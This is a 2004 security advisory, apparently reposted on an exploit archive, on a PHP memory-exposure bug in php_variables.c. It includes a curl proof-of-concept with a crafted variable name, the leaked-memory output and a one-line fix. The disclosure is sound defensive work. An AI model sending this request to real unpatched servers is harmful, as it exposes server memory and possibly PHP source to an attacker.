phpvulns501.txt

phpvulns501.txt: Posted Sep 17, 2004; Authored by Stefano Di Paola; PHP versions above 4.1.2 and below or equal to 5.0.1 suffer from an exposure of arbitrary memory due to bad array parsing in php_variables.c.; tags | advisory, arbitrary, php; SHA-256 | afb6950881a4adf473bb29cac47e02559b458a3982c48313c7fdb03ba7a60852; Download | Favorite | View

phpvulns501.txt

Hi all,
This summer i have been playing around with some php issue
and got some php vulnerabilities..

Let's go for the first one:



==========================================================
Title: php(super)info().
Affected: Php <= 5.0.1
Not Affected: it seems Php <= 4.1.2
Vulnerability Type:  Exposure of sensitive informations
Vendor Status: Fix released on cvs.php.net


==Summary:

Bad array parsing in php_variables.c could lead to show arbitrary memory
content such as pieces of php code and other data.
This affects all GET, POST or COOKIES variables.



==Description:

By appending to a GET/POST/COOKIE variable array a [ (open square
bracket) like abc[a][, 
the length of the 'a' array element is set to the length of variable
name strlen("abc").


$ curl  "http://www.example.com/phpinfo.php" -d `perl -e 'print
"f"x100;print "[g][=1"'`

where phpinfo.php is:
<?
phpinfo();
?>

or some php file containing print_r function:
<?
print_r($_REQUEST);
?>

it will print the output similar to:
------------------------------------------------
  Array
(
    [ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
      ffffffffffffffffffffffffffffffffffffffff] => Array
        (
           
[g\0_\0123\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0] => 1
        )
)
-----------------------------------------------

As probably you might have noticed all the garbage shown is memory
content that could be everything (on the heap i suppose). 

I have tried some request and it expose some piece of php code sometime.




==Solution: 
Authors were contacted and they released a fix for this problem.

The problem is easy to fix.

Find and replace around line 136 for php 5.0.1 in main/php_variables.c
from:

index_len = var_len = strlen(var);

to:

index_len = var_len = strlen(index);
and compile again.

But if you're lazy the patch can be found on the CVS
cvs.php.net/main/php_variables.c

=========================================


Stefano Di Paola

....----oOOo-------oOOo----....
Stefano Di Paola
Software Engineer
stefano.dipaola_at_wisec_dot_it
stefano.dipaola1_at_tin_dot_it
--------------------------------

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 87 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 4 files
Google Security Research 3 files
Jann Horn 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

phpvulns501.txt

phpvulns501.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpvulns501.txt

Share This

phpvulns501.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems